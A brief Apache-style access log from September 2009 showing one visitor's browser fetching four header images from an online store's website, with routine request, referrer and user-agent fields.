121.169.189.169 - - [12/Sep/2009:02:55:24 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [12/Sep/2009:02:55:24 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [12/Sep/2009:02:55:24 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [12/Sep/2009:02:55:24 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
